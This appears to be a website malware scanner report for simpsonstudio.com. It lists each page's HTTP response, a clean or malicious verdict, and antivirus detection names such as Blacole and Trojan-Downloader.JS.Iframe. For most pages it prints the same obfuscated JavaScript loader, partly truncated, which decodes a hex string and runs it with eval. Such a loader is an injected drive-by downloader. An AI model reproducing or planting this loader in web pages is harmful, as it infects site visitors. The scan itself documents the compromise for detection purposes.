| Request | Server response | Status |
http://simpsonstudio.com/ | 200 OK
Content-Length: 8020
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/welcome.html | 200 OK
Content-Length: 8023
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/history.html | 200 OK
Content-Length: 8542
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/printing.html | 200 OK
Content-Length: 2604
Content-Type: text/html | clean |
http://simpsonstudio.com/services.html | 200 OK
Content-Length: 8554
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/pricing.html | 200 OK
Content-Length: 2424
Content-Type: text/html | clean |
http://simpsonstudio.com/samples.html | 200 OK
Content-Length: 8222
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/careers.html | 200 OK
Content-Length: 10064
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/sale.html | 200 OK
Content-Length: 9018
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/contact.html | 200 OK
Content-Length: 8236
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eselv=String;lig="spl"+"i"+"t";lnz=window;bwrbrf=(1)?"0x":"123";njfnh=(5-3-1);try{if(Math.ceil(5.5)===0x6)--(document["b"+"ody"])}catch(mumvs){qrp=false;try{}catch(nlw){qrp=21;}if(1){amb="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq59Zq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq59Zq17Zq34Zq17Zq5b
... 3000 bytes are skipped ...Zq5cZq5bZq56Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq59Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[lig]("Zq");}lnz=amb;bnovrn=[];for(wgnw=22-20-2;-wgnw+1380!=0;wgnw+=1){owgim=wgnw;if((0x19==031))bnovrn+=eselv.fromCharCode(eval(bwrbrf+lnz[1*owgim])+0xa-njfnh);}cwrt=eval;if(Math.ceil(5.5)===6)cwrt(bnovrn)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Ad-Aware
- JS:Trojan.JS.Iframe.DL
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Trojan.JS.Iframe.DL
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Trojan.JS.Iframe.DL (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfe
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.DL
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Trojan.JS.Iframe.DL
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Trojan.JS.Iframe.DL
- BitDefender
- JS:Trojan.JS.Iframe.DL
|
http://simpsonstudio.com/test404page.js | 404 Not Found
Content-Length: 331
Content-Type: text/html | clean |
